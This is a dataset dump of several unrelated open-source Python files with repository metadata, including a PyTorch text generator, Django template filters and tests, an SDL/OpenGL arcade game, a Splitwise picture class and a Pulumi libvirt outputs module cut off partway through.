avg_line_length: 22 | max_line_length: 82 | alphanum_fraction: 0.564442

hexsha: 69544afab18defc139311bea075a73e30a48249d | size: 3,163 | ext: py | lang: Python
max_stars: word_language_model/generate.py | manna/pytorch-examples @ 659e11ac42fe46ea09bcaf8424ed5404fae7407d | ["BSD-3-Clause"] | count: null
max_issues: word_language_model/generate.py | manna/pytorch-examples @ 659e11ac42fe46ea09bcaf8424ed5404fae7407d | ["BSD-3-Clause"] | count: null
max_forks: word_language_model/generate.py | manna/pytorch-examples @ 659e11ac42fe46ea09bcaf8424ed5404fae7407d | ["BSD-3-Clause"] | count: null
content:
###############################################################################
# Language Modeling on Penn Tree Bank
#
# This file generates new sentences sampled from the language model
#
###############################################################################
import argparse
import torch
from torch.autograd import Variable
import data
parser = argparse.ArgumentParser(description='PyTorch Wikitext-2 Language Model')
# Model parameters.
parser.add_argument('--data', type=str, default='./data/wikitext-2',
help='location of the data corpus')
parser.add_argument('--checkpoint', type=str, default='./model.pt',
help='model checkpoint to use')
parser.add_argument('--outf', type=str, default='generated.txt',
help='output file for generated text')
parser.add_argument('--words', type=int, default=1000,
help='number of words to generate')
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--cuda', action='store_true',
help='use CUDA')
parser.add_argument('--temperature', type=float, default=1.0,
help='temperature - higher will increase diversity')
parser.add_argument('--log-interval', type=int, default=100,
help='reporting interval')
parser.add_argument('--primer', type=str, default='',
help='Beginning of generated text. Example: "Yesterday , she"')
args = parser.parse_args()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
device = torch.device("cuda" if args.cuda else "cpu")
if args.temperature < 1e-3:
parser.error("--temperature has to be greater or equal 1e-3")
with open(args.checkpoint, 'rb') as f:
model = torch.load(f).to(device)
model.eval()
corpus = data.Corpus(args.data)
ntokens = len(corpus.dictionary)
hidden = model.init_hidden(1)
input = torch.randint(ntokens, (1, 1), dtype=torch.long).to(device) # Represents the first word, which is randomly selected.
if args.primer:
with open(args.outf, 'w') as outf:
outf.write(args.primer + ' ')
primer_words = args.primer.split()
for word in primer_words:
word_idx = corpus.dictionary.word2idx[word]
input.fill_(word_idx)
_output, hidden = model(input, hidden)
with open(args.outf, 'ab') as outf:
with torch.no_grad(): # no tracking history
for i in range(args.words):
output, hidden = model(input, hidden)
word_weights = output.squeeze().div(args.temperature).exp().cpu()
word_idx = torch.multinomial(word_weights, 1)[0]
input.fill_(word_idx)
word = corpus.dictionary.idx2word[word_idx]
outstr = word + ('\n' if i % 20 == 19 else ' ')
outf.write(outstr.encode('utf-8'))
if i % args.log_interval == 0:
print('| Generated {}/{} words'.format(i, args.words))
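# Hedged illustration (not part of the original script): the effect of the temperature
# division in the loop above, shown on a toy score vector. Lower temperatures sharpen the
# sampling distribution, higher temperatures flatten it.
toy_scores = torch.tensor([2.0, 1.0, 0.1])
for t in (0.5, 1.0, 2.0):
    w = toy_scores.div(t).exp()
    print(t, (w / w.sum()).tolist())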
avg_line_length: 38.573171 | max_line_length: 124 | alphanum_fraction: 0.606386

hexsha: 5afb3c1cdcb33f01f49d9b9751845396ec41aa76 | size: 87 | ext: py | lang: Python
max_stars: tests/periodicities/Second/Cycle_Second_1600_S_5.py | jmabry/pyaf @ afbc15a851a2445a7824bf255af612dc429265af | ["BSD-3-Clause"] | count: null
max_issues: tests/periodicities/Second/Cycle_Second_1600_S_5.py | jmabry/pyaf @ afbc15a851a2445a7824bf255af612dc429265af | ["BSD-3-Clause"] | count: 1 | 2019-11-30T23:39:38.000Z to 2019-12-01T04:34:35.000Z
max_forks: tests/periodicities/Second/Cycle_Second_1600_S_5.py | jmabry/pyaf @ afbc15a851a2445a7824bf255af612dc429265af | ["BSD-3-Clause"] | count: null
content:
import pyaf.tests.periodicities.period_test as per
per.buildModel((5 , 'S' , 1600));
avg_line_length: 17.4 | max_line_length: 50 | alphanum_fraction: 0.724138

hexsha: 6b9a2af2893514a1813cbe2dfb590a11af5b04e0 | size: 689 | ext: py | lang: Python
max_stars: src/wellsfargo/templatetags/wfrs_filters.py | thelabnyc/django-oscar-wfrs @ 9abd4ecbdafd597407fdf60657103cb5d29c4c8b | ["0BSD"] | count: 1 | 2021-02-08T05:54:56.000Z to 2021-02-08T05:54:56.000Z
max_issues: src/wellsfargo/templatetags/wfrs_filters.py | thelabnyc/django-oscar-wfrs @ 9abd4ecbdafd597407fdf60657103cb5d29c4c8b | ["0BSD"] | count: 24 | 2019-12-04T21:37:01.000Z to 2022-03-11T23:16:20.000Z
max_forks: src/wellsfargo/templatetags/wfrs_filters.py | thelabnyc/django-oscar-wfrs @ 9abd4ecbdafd597407fdf60657103cb5d29c4c8b | ["0BSD"] | count: 2 | 2016-05-31T10:02:35.000Z to 2016-12-19T11:29:37.000Z
content:
from django.utils.translation import ugettext as _
from django import template
import pytz
register = template.Library()
@register.filter(name="timeat")
def timeat(value):
try:
return _("%(years)s years, %(months)s months") % dict(
years=int(value[2:]), months=int(value[:2])
)
except Exception:
return ""
@register.filter(name="timesinceminutes")
def timesinceminutes(dt_to, dt_from):
if not dt_to or not dt_from:
return ""
return round((dt_to - dt_from).total_seconds() / 60)
@register.filter(name="localizedatetime")
def localizedatetime(value):
if not value:
return ""
return pytz.utc.localize(value)
avg_line_length: 22.225806 | max_line_length: 62 | alphanum_fraction: 0.66328

hexsha: db71a7c87f0878c7a4975f501b0574afdd082384 | size: 530 | ext: py | lang: Python
max_stars: example_project/testapp/tests.py | lincolnloop/django-activity-stream @ b1b4884624fab982b35fbcbd28ed321d12e3d054 | ["BSD-3-Clause"] | count: null
max_issues: example_project/testapp/tests.py | lincolnloop/django-activity-stream @ b1b4884624fab982b35fbcbd28ed321d12e3d054 | ["BSD-3-Clause"] | count: null
max_forks: example_project/testapp/tests.py | lincolnloop/django-activity-stream @ b1b4884624fab982b35fbcbd28ed321d12e3d054 | ["BSD-3-Clause"] | count: null
content:
from datetime import datetime
from django.test import TestCase
from django.contrib.auth.models import User
from actstream.models import Action
from actstream.signals import action
class TestAppTests(TestCase):
def setUp(self):
self.user = User.objects.create(username='test')
action.send(self.user, verb='was created')
def test_accessor(self):
self.assertEqual(len(Action.objects.testfoo(self.user)), 1)
self.assertEqual(len(Action.objects.testfoo(self.user, datetime(1970, 1, 1))), 0)
avg_line_length: 31.176471 | max_line_length: 89 | alphanum_fraction: 0.732075

hexsha: f45cd58c3abf6095cc23977e04ce5a1f9a6f2d03 | size: 14,054 | ext: py | lang: Python
max_stars: example.py | fdkz/libcopengl @ e796abd7d8cede5b5f7aff92b815bd2b6f29b1da | ["MIT"] | count: null
max_issues: example.py | fdkz/libcopengl @ e796abd7d8cede5b5f7aff92b815bd2b6f29b1da | ["MIT"] | count: null
max_forks: example.py | fdkz/libcopengl @ e796abd7d8cede5b5f7aff92b815bd2b6f29b1da | ["MIT"] | count: 1 | 2021-12-14T11:32:20.000Z to 2021-12-14T11:32:20.000Z
content:
import logging
logg = logging.getLogger(__name__)
if __name__ == "__main__":
logging.basicConfig(level=logging.NOTSET, format="%(asctime)s %(name)s %(levelname)-5s: %(message)s")
import sys
import time
import math
import random
import ctypes
from sdl2 import *
# uncomment these to use pyopengl
#from OpenGL.GL import *
#glTranslatef = glTranslate
from copengl import *
class FpsCounter:
def __init__(self, update_interval_seconds=0.5):
""" read self.fps for output """
self.fps = 0.
self.interval = update_interval_seconds
self._counter = 0.
self._age = 0.
self._last_output_age = 0.
def tick(self, dt):
self._age += dt
self._counter += 1.
if self._age > self.interval:
self.fps = self._counter / self._age
self._age = 0.
self._counter = 0.
class Explosion:
def __init__(self, x, y, direction, v):
self.x, self.y = x, y
self.direction = direction
self.v = v
self.age = 0.
self.dead = False
self.r = 0.
self.lifetime = 0.6
self.turndirection = direction
def render(self):
self.sideangle = 140.
a = math.radians(self.direction + self.turndirection)
x1, y1 = self.x + self.r * math.sin(a), self.y + self.r * math.cos(a)
a = math.radians(self.direction + self.turndirection + self.sideangle)
x2, y2 = self.x + self.r * math.sin(a), self.y + self.r * math.cos(a)
a = math.radians(self.direction + self.turndirection - self.sideangle)
x3, y3 = self.x + self.r * math.sin(a), self.y + self.r * math.cos(a)
glColor4d(1., 0.3, 0.2, 1. - self.age / self.lifetime)
glBegin(GL_TRIANGLE_FAN)
glVertex3d(x1, y1, 0.)
glVertex3d(x2, y2, 0.)
glVertex3d(x3, y3, 0.)
glEnd()
glColor4d(0.4, 0., 0., 1. - self.age / self.lifetime)
glBegin(GL_LINE_LOOP)
glVertex3d(x1, y1, 0.)
glVertex3d(x2, y2, 0.)
glVertex3d(x3, y3, 0.)
glEnd()
def tick(self, dt):
self.r += dt * 8.
self.x += self.v * math.sin(math.radians(self.direction)) * dt
self.y += self.v * math.cos(math.radians(self.direction)) * dt
self.age += dt
self.turndirection += dt * 1500.
if self.age > self.lifetime:
self.dead = True
class Bullet:
def __init__(self, x, y, direction, v, owner):
self.x, self.y = x, y
self.direction = direction
self.v = v
self.age = 0.
self.r = 0.5
self.dead = False
self.owner = owner
def render(self):
a = math.radians(self.direction)
x2, y2 = self.x, self.y
x1, y1 = self.x + self.r * math.sin(a), self.y + self.r * math.cos(a)
glShadeModel(GL_SMOOTH)
glBegin(GL_LINES)
glColor4d(0.3, 0.2, 0.1, 1.)
glVertex3d(x1, y1, 0.)
glColor4d(0.3, 0.2, 0.1, 0.)
glVertex3d(x2, y2, 0.)
glEnd()
def tick(self, dt):
self.x += self.v * math.sin(math.radians(self.direction)) * dt
self.y += self.v * math.cos(math.radians(self.direction)) * dt
self.age += dt
if self.age > 3.:
self.dead = True
class Crawly:
def __init__(self, x, y):
self.x, self.y = x, y
self.v = 0.
self.acc = 0.
self.direction = 0.
self.leglen = 0.5*1.5
self.legs = [[0., 0.] for i in range(10)]
self.legs2 = [[0., 0.] for i in range(10)]
self._place_legs()
self._place_legs2()
# feedback variables
self.direction_new = 0.
# 0 - default. red
# 1 - friend. green
# 2 - unknown. blue
self.color = 0.
self.speedlimit = 5.
self.r = 0.3
self.influence_radius = 1.0
self.sideangle = 140.
self.dead = False
self.age = 0.
self.randomstarttime = random.random() * 10.
self.randomheartbeatspeed = (random.random() + 0.5) * 13.
def _place_legs(self):
side = -1.
for i, l in enumerate(self.legs):
side = -side
if math.hypot(self.x - l[0], self.y - l[1]) > self.leglen + 0.1:
# calc new leg position
y = int(i / 2) + 1
l[0] = self.x + math.sin(math.radians(self.direction - 8. * y * side)) * self.leglen
l[1] = self.y + math.cos(math.radians(self.direction - 8. * y * side)) * self.leglen
def _place_legs2(self):
side = -1.
for i, l2 in enumerate(self.legs2):
# calc new leg position
y = int(i / 2) + 1
l = self.legs[i]
l2[0] = self.x + (l[0] - self.x) / 2. + math.sin(math.radians(self.direction)) * self.leglen * .2
l2[1] = self.y + (l[1] - self.y) / 2. + math.cos(math.radians(self.direction)) * self.leglen * .2
def tick(self, dt):
self.age += dt
damping = 0.999
self.direction = self.direction_new
dx = math.sin(math.radians(self.direction))
dy = math.cos(math.radians(self.direction))
dv = self.acc * dt
self.v += dv
if self.v > self.speedlimit:
self.v = self.speedlimit
self.x += dx * (self.v * dt + self.acc * dt * dt / 2.)
self.y += dy * (self.v * dt + self.acc * dt * dt / 2.)
self.acc = 0
self._place_legs()
self._place_legs2()
def _render_legs(self):
glBegin(GL_LINES)
glColor4d(0., 0., 0., 1.)
# use simple legs
#for l in self.legs:
# glVertex3d(self.x, self.y, 0.)
# glVertex3d(l[0], l[1], 0.)
for l in self.legs2:
glVertex3d(self.x, self.y, 0.)
glVertex3d(l[0], l[1], 0.)
for i, l in enumerate(self.legs):
l2 = self.legs2[i]
glVertex3d(l2[0], l2[1], 0.)
glVertex3d(l[0], l[1], 0.)
glEnd()
def render(self):
r = self.r + 0.05 * math.sin(self.age * self.randomheartbeatspeed + self.randomstarttime)
a = math.radians(self.direction)
x1, y1 = self.x + r * math.sin(a), self.y + r * math.cos(a)
a = math.radians(self.direction + self.sideangle)
x2, y2 = self.x + r * math.sin(a), self.y + r * math.cos(a)
a = math.radians(self.direction - self.sideangle)
x3, y3 = self.x + r * math.sin(a), self.y + r * math.cos(a)
self._render_legs()
if self.color == 0: glColor4d(1., 0.3, 0.2, 1.)
elif self.color == 1: glColor4d(0., 0.8, 0.2, 1.)
elif self.color == 2: glColor4d(0., 0., 1., 1.)
glBegin(GL_TRIANGLE_FAN)
glVertex3d(x1, y1, 0.)
glVertex3d(x2, y2, 0.)
glVertex3d(x3, y3, 0.)
glEnd()
if self.color == 0: glColor4d(0.4, 0., 0., 1.)
else: glColor4d(0., 0., 0., 1.)
glBegin(GL_LINE_LOOP)
glVertex3d(x1, y1, 0.)
glVertex3d(x2, y2, 0.)
glVertex3d(x3, y3, 0.)
glEnd()
# render the crawly influence area for debugging.
if 0:
glColor4d(0.7, 0.7, 0.7, 1.0)
glBegin(GL_LINE_LOOP)
for a in range(0, 360, 30):
x, y = self.x + self.influence_radius * math.sin(math.radians(a)), self.y + self.influence_radius * math.cos(math.radians(a))
glVertex3d(x, y, 0.)
glEnd()
class Circle:
def __init__(self, x, y, r, color):
# color is an (r, g, b, a) tuple
self.x, self.y, self.r = x, y, r
self.red, self.g, self.b, self.a = color
def render(self):
glColor4d(self.red, self.g, self.b, self.a)
glBegin(GL_TRIANGLE_FAN)
for a in range(0, 360, 10):
x, y = self.x + self.r * math.sin(math.radians(a)), self.y + self.r * math.cos(math.radians(a))
glVertex3f(x, y, 0.)
glEnd()
glBegin(GL_LINE_LOOP)
for a in range(0, 360, 10):
x, y = self.x + self.r * math.sin(math.radians(a)), self.y + self.r * math.cos(math.radians(a))
glVertex3f(x, y, 0.)
glEnd()
class CrawlyWorld:
def __init__(self):
self.crawlys = [self.new_crawly() for i in range(30)]
self.crawlys[0].color = 1
self.crawlys[0].speedlimit = 9.
self.bullets = []
self.explosions = []
self.circles = []
self.init_circles()
def _set_projection(self, w, h, fov_x=90., z_near=1., z_far=50*1000.):
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
#gluPerspective(fov_x * float(h) / w, float(w) / h, z_near, z_far)
# make it so that enlarging the window just brings more of the world into view
d = 0.04
glOrtho(-w*d/2., w*d/2., -h*d/2., h*d/2., z_near, z_far)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def init_circles(self):
self.circles.append(Circle(-3, 0, 2, (0.5, 0.5, 0.4, 1.)))
self.circles.append(Circle(3, 1, 3, (0.5, 0.5, 1., 1.)))
self.circles.append(Circle(-8, 7, 2.4, (0.7, 0.2, 1., 1.)))
def new_crawly(self):
c = Crawly(random.randrange(-1000., 1000.) * .01, random.randrange(-1000., 1000.) * .01)
c.influence_radius = 2. - random.randrange(-10., 10.) * 0.01
c.speedlimit = 5. + random.randrange(-10., 10.) * 0.2
return c
def crawly_angle(self, crawly1, crawly2):
""" return angle between two creatures """
a = math.degrees(math.atan2(crawly1.x - crawly2.x, crawly1.y - crawly2.y))
offset, dummy = math.modf((a - crawly1.direction) / 360.)
offset *= 360.
if offset > 180.: offset -= 360.
if offset < -180.: offset += 360.
return offset
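# Hedged aside (not part of example.py): the math.modf trick above wraps an arbitrary
# angle difference into the [-180, 180] degree range before choosing a turn direction;
# for example a raw difference of 370 degrees wraps to 10, and -190 wraps to 170.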
def crawly_turn_direction(self, crawly1, crawly2):
""" return in which direction the creature should turn in order to torn away from another """
a = self.crawly_angle(crawly1, crawly2)
if a < 0.: return 1.
return -1.
def tick(self, dt, keys):
speed = 11.5
turn_speed = 170.
p = self.crawlys[0]
if keys[SDL_SCANCODE_LEFT]: p.direction_new -= turn_speed * dt
if keys[SDL_SCANCODE_RIGHT]: p.direction_new += turn_speed * dt
if keys[SDL_SCANCODE_UP]: p.acc = speed * 0.6
if keys[SDL_SCANCODE_DOWN]: p.acc = -speed * 0.6
bullet_speed = 6.
if keys[SDL_SCANCODE_X]:
self.bullets.append(Bullet(p.x, p.y, p.direction + 5 * (random.random() - 0.5), bullet_speed + p.v, p))
# cleanup our object lists
self.bullets = [b for b in self.bullets if not b.dead]
self.explosions = [e for e in self.explosions if not e.dead]
self.crawlys = [c for c in self.crawlys if not c.dead]
# did bullets do any damage?
# line-circle intersection. just test the bullet start/end points and crawly radius.
for b in self.bullets:
for c in self.crawlys:
dist2 = (c.x - b.x) * (c.x - b.x) + (c.y - b.y) * (c.y - b.y)
if dist2 < c.r * c.r and b.owner is not c and not c.dead:
b.dead = True
c.dead = True
self.explosions.append(Explosion(c.x, c.y, c.direction, c.v))
self.crawlys.append(self.new_crawly())
bad_crawly_speed = 1.3
bad_crawly_turn_speed = 180.
# chase the player
for c in self.crawlys:
if c is not p:
c.acc = bad_crawly_speed * 1.3
c.direction_new += self.crawly_turn_direction(c, p) * bad_crawly_turn_speed * dt
# avoid each other
# if the distance is smaller than planned, then just steer away.
if True:
for c1 in self.crawlys:
for c2 in self.crawlys:
if c1 is not c2 and c1 is not p and c2:
dist2 = (c1.x - c2.x) * (c1.x - c2.x) + (c1.y - c2.y) * (c1.y - c2.y)
if dist2 < c1.influence_radius * c1.influence_radius:
a = self.crawly_angle(c2, c1)
if a > -90. and a < -90.: c1.v *= 0.9
d = 1. - dist2 / (c1.influence_radius * c1.influence_radius)
if a < 0.: c1.direction_new += bad_crawly_turn_speed * dt * 4. * d
else: c1.direction_new -= bad_crawly_turn_speed * dt * 4. * d
# avoid the shapes
if True:
for c in self.crawlys:
for circ in self.circles:
dist = math.hypot(c.x - circ.x, c.y - circ.y)
if dist < c.influence_radius * c.influence_radius:
a = self.crawly_angle(c, circ)
if a > -90. and a < -90.: c.v *= 0.9
d = 1. - dist / (c.influence_radius * circ.r)
if a < 0.: c.direction_new -= 2 * bad_crawly_turn_speed * dt * 4. * d
else: c.direction_new += 2 * bad_crawly_turn_speed * dt * 4. * d
for c in self.crawlys:
c.tick(dt)
for b in self.bullets:
b.tick(dt)
for e in self.explosions:
e.tick(dt)
def render(self, window_w, window_h):
glClearColor(0.8,0.8,1.8,1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
#glColor(1,0,0,1)
self._set_projection(window_w, window_h, 160)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glTranslatef(0., 0., -15.)
for c in self.circles:
c.render()
for c in self.crawlys:
c.render()
for b in self.bullets:
b.render()
for e in self.explosions:
e.render()
class Main:
def __init__(self):
self.w = 800
self.h = 600
self.crawlyworld = CrawlyWorld()
self.fpscounter = FpsCounter()
self.fps_log_time = time.time()
self.keys = None
def run(self):
if SDL_Init(SDL_INIT_VIDEO) != 0:
logg.error(SDL_GetError())
return -1
window = SDL_CreateWindow(b"copengl example", SDL_WINDOWPOS_UNDEFINED,
SDL_WINDOWPOS_UNDEFINED, self.w, self.h,
SDL_WINDOW_OPENGL | SDL_WINDOW_RESIZABLE)
if not window:
logg.error(SDL_GetError())
return -1
context = SDL_GL_CreateContext(window)
glClearColor(0., 0., 0., 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
if SDL_GL_SetSwapInterval(-1): # 0 to disable vsync
logg.error(SDL_GetError())
if SDL_GL_SetSwapInterval(1):
logg.error("SDL_GL_SetSwapInterval: %s", SDL_GetError())
logg.error("vsync failed completely. will munch cpu for lunch.")
self.keys = SDL_GetKeyboardState(None)
self._init_gl()
# init done. start the mainloop!
last_t = time.time()
event = SDL_Event()
running = True
while running:
while SDL_PollEvent(ctypes.byref(event)) != 0:
if event.type == SDL_QUIT:
running = False
if event.type == SDL_KEYDOWN:
if event.key.keysym.scancode == SDL_SCANCODE_ESCAPE:
running = False
if event.type == SDL_WINDOWEVENT:
if event.window.event == SDL_WINDOWEVENT_SIZE_CHANGED:
self.w, self.h = event.window.data1, event.window.data2
t = time.time()
self._render_frame(t - last_t)
last_t = t
SDL_GL_SwapWindow(window)
SDL_GL_DeleteContext(context)
SDL_DestroyWindow(window)
SDL_Quit()
def _render_frame(self, dt):
self.fpscounter.tick(dt)
glViewport(0, 0, self.w, self.h)
self.crawlyworld.tick(dt, self.keys)
self.crawlyworld.render(self.w, self.h)
t = time.time()
if self.fps_log_time + 2 < t:
logg.info("fps: %i", self.fpscounter.fps)
self.fps_log_time = t
def _init_gl(self):
glDisable(GL_TEXTURE_2D)
glDisable(GL_DEPTH_TEST)
glDisable(GL_FOG)
glDisable(GL_DITHER)
glDisable(GL_LIGHTING)
glShadeModel(GL_FLAT)
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glEnable(GL_LINE_SMOOTH)
glDisable(GL_LINE_STIPPLE)
if __name__ == "__main__":
logg.info("")
logg.info("------------------------------------")
logg.info("usage: press arrows and x")
logg.info("------------------------------------")
logg.info("")
w = Main()
sys.exit(w.run())
avg_line_length: 27.395712 | max_line_length: 129 | alphanum_fraction: 0.636118

hexsha: 5a47fb075db191bc26a3f88ceb30acf3f7f8420c | size: 1,334 | ext: py | lang: Python
max_stars: splitwise/picture.py | aayaffe/splitwise @ 477e0477bea9fc74693669c68431fe5ea0b08ef3 | ["MIT"] | count: 105 | 2016-08-01T02:46:49.000Z to 2022-02-11T21:08:48.000Z
max_issues: splitwise/picture.py | aayaffe/splitwise @ 477e0477bea9fc74693669c68431fe5ea0b08ef3 | ["MIT"] | count: 47 | 2016-08-27T05:09:52.000Z to 2022-03-20T06:30:46.000Z
max_forks: splitwise/picture.py | aayaffe/splitwise @ 477e0477bea9fc74693669c68431fe5ea0b08ef3 | ["MIT"] | count: 43 | 2016-08-15T18:50:58.000Z to 2022-03-27T19:45:03.000Z
content:
class Picture(object):
""" Profile picture of the user.
Attributes:
small(str, optional): Link to small size picture
medium(str, optional): Link to medium size picture
large(str, optional): Link to large size picture
"""
def __init__(self, data=None):
"""
Args:
data(:obj:`json`, optional): JSON object representing picture object
"""
if data:
self.medium = data["medium"]
if "small" in data:
self.small = data["small"]
else:
self.small = None
if "large" in data:
self.large = data["large"]
else:
self.large = None
def getSmall(self):
""" Returns the link to small size picture of the user
Returns:
str: Link to small size picture of the user
"""
return self.small
def getMedium(self):
""" Returns the link to medium size picture of the user
Returns:
str: Link to medium size picture of the user
"""
return self.medium
def getLarge(self):
""" Returns the link to large size picture of the user
Returns:
str: Link to large size picture of the user
"""
return self.large
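# Hedged usage sketch (not part of the original module): constructing a Picture from the
# kind of JSON fragment this class expects. The URLs are placeholder values.
data = {"medium": "https://example.com/avatar_m.png", "small": "https://example.com/avatar_s.png"}
picture = Picture(data)
print(picture.getSmall(), picture.getMedium(), picture.getLarge())  # large falls back to None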
avg_line_length: 26.68 | max_line_length: 82 | alphanum_fraction: 0.532234

hexsha: dcace7933866c4c8afa23c4b0e9e0f6e6b4c0fac | size: 36,817 | ext: py | lang: Python
max_stars: sdk/python/pulumi_libvirt/outputs.py | pulumi/pulumi-libvirt @ 0a190bfea0981aff9e4bc0e1bfa91ee16c54bb38 | ["ECL-2.0", "Apache-2.0"] | count: 10 | 2021-04-29T14:33:35.000Z to 2022-03-31T21:59:48.000Z
max_issues: sdk/python/pulumi_libvirt/outputs.py | pulumi/pulumi-libvirt @ 0a190bfea0981aff9e4bc0e1bfa91ee16c54bb38 | ["ECL-2.0", "Apache-2.0"] | count: 28 | 2021-08-15T07:46:26.000Z to 2022-03-31T15:30:59.000Z
max_forks: sdk/python/pulumi_libvirt/outputs.py | pulumi/pulumi-libvirt @ 0a190bfea0981aff9e4bc0e1bfa91ee16c54bb38 | ["ECL-2.0", "Apache-2.0"] | count: 1 | 2021-12-17T23:11:19.000Z to 2021-12-17T23:11:19.000Z
content:
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
__all__ = [
'DomainBootDevice',
'DomainConsole',
'DomainCpu',
'DomainDisk',
'DomainFilesystem',
'DomainGraphics',
'DomainNetworkInterface',
'DomainNvram',
'DomainTpm',
'DomainVideo',
'DomainXml',
'NetworkDhcp',
'NetworkDns',
'NetworkDnsForwarder',
'NetworkDnsHost',
'NetworkDnsSrv',
'NetworkDnsmasqOptions',
'NetworkDnsmasqOptionsOption',
'NetworkRoute',
'NetworkXml',
'PoolXml',
'VolumeXml',
]
@pulumi.output_type
class DomainBootDevice(dict):
def __init__(__self__, *,
devs: Optional[Sequence[str]] = None):
if devs is not None:
pulumi.set(__self__, "devs", devs)
@property
@pulumi.getter
def devs(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "devs")
@pulumi.output_type
class DomainConsole(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "targetPort":
suggest = "target_port"
elif key == "sourceHost":
suggest = "source_host"
elif key == "sourcePath":
suggest = "source_path"
elif key == "sourceService":
suggest = "source_service"
elif key == "targetType":
suggest = "target_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainConsole. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainConsole.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainConsole.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
target_port: str,
type: str,
source_host: Optional[str] = None,
source_path: Optional[str] = None,
source_service: Optional[str] = None,
target_type: Optional[str] = None):
"""
:param str target_port: Target port
:param str type: Console device type. Valid values are "pty" and "tcp".
:param str source_host: IP address to listen on. Defaults to 127.0.0.1.
:param str source_path: Source path
:param str source_service: Port number or a service name. Defaults to a
random port.
:param str target_type: for the first console and defaults to `serial`.
Subsequent `console` blocks must have a different type - usually `virtio`.
"""
pulumi.set(__self__, "target_port", target_port)
pulumi.set(__self__, "type", type)
if source_host is not None:
pulumi.set(__self__, "source_host", source_host)
if source_path is not None:
pulumi.set(__self__, "source_path", source_path)
if source_service is not None:
pulumi.set(__self__, "source_service", source_service)
if target_type is not None:
pulumi.set(__self__, "target_type", target_type)
@property
@pulumi.getter(name="targetPort")
def target_port(self) -> str:
"""
Target port
"""
return pulumi.get(self, "target_port")
@property
@pulumi.getter
def type(self) -> str:
"""
Console device type. Valid values are "pty" and "tcp".
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="sourceHost")
def source_host(self) -> Optional[str]:
"""
IP address to listen on. Defaults to 127.0.0.1.
"""
return pulumi.get(self, "source_host")
@property
@pulumi.getter(name="sourcePath")
def source_path(self) -> Optional[str]:
"""
Source path
"""
return pulumi.get(self, "source_path")
@property
@pulumi.getter(name="sourceService")
def source_service(self) -> Optional[str]:
"""
Port number or a service name. Defaults to a
random port.
"""
return pulumi.get(self, "source_service")
@property
@pulumi.getter(name="targetType")
def target_type(self) -> Optional[str]:
"""
for the first console and defaults to `serial`.
Subsequent `console` blocks must have a different type - usually `virtio`.
"""
return pulumi.get(self, "target_type")
@pulumi.output_type
class DomainCpu(dict):
def __init__(__self__, *,
mode: str):
pulumi.set(__self__, "mode", mode)
@property
@pulumi.getter
def mode(self) -> str:
return pulumi.get(self, "mode")
@pulumi.output_type
class DomainDisk(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "blockDevice":
suggest = "block_device"
elif key == "volumeId":
suggest = "volume_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DomainDisk. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DomainDisk.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DomainDisk.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
block_device: Optional[str] = None,
file: Optional[str] = None,
scsi: Optional[bool] = None,
url: Optional[str] = None,
volume_id: Optional[str] = None,
wwn: Optional[str] = None):
"""
:param str block_device: The path to the host device to use as the block device for this disk.
:param str file: The filename to use as the block device for this disk (read-only)
:param bool scsi: Use a scsi controller for this disk. The controller
model is set to `virtio-scsi`
:param str url: The http url to use as the block device for this disk (read-only)
:param str volume_id: The volume id to use for this disk.
:param str wwn: Specify a WWN to use for the disk if the disk is using
a scsi controller, if not specified then a random wwn is generated for the disk
"""
if block_device is not None:
pulumi.set(__self__, "block_device", block_device)
if file is not None:
pulumi.set(__self__, "file", file)
if scsi is not None:
pulumi.set(__self__, "scsi", scsi)
if url is not None:
pulumi.set(__self__, "url", url)
if volume_id is not None:
pulumi.set(__self__, "volume_id", volume_id)
if wwn is not None:
pulumi.set(__self__, "wwn", wwn)
@property
@pulumi.getter(name="blockDevice")
def block_device(self) -> Optional[str]:
"""
The path to the host device to use as the block device for this disk.
"""
return pulumi.get(self, "block_device")
@property
@pulumi.getter
def file(self) -> Optional[str]:
"""
The filename to use as the block device for this disk (read-only)
"""
return pulumi.get(self, "file")
@property
@pulumi.getter
def scsi(self) -> Optional[bool]:
"""
Use a scsi controller for this disk. The controller
model is set to `virtio-scsi`
"""
return pulumi.get(self, "scsi")
@property
@pulumi.getter
def url(self) -> Optional[str]:
"""
The http url to use as the block device for this disk (read-only)
"""
return pulumi.get(self, "url")
@property
@pulumi.getter(name="volumeId")
def volume_id(self) -> Optional[str]:
"""
The volume id to use for this disk.
"""
return pulumi.get(self, "volume_id")
@property
@pulumi.getter
def wwn(self) -> Optional[str]:
"""
Specify a WWN to use for the disk if the disk is using
a scsi controller, if not specified then a random wwn is generated for the disk
"""
return pulumi.get(self, "wwn")
@pulumi.output_type
class DomainFilesystem(dict):
def __init__(__self__, *,
source: str,
target: str,
accessmode: Optional[str] = None,
readonly: Optional[bool] = None):
pulumi.set(__self__, "source", source)
pulumi.set(__self__, "target", target)
if accessmode is not None:
pulumi.set(__self__, "accessmode", accessmode)
if readonly is not None:
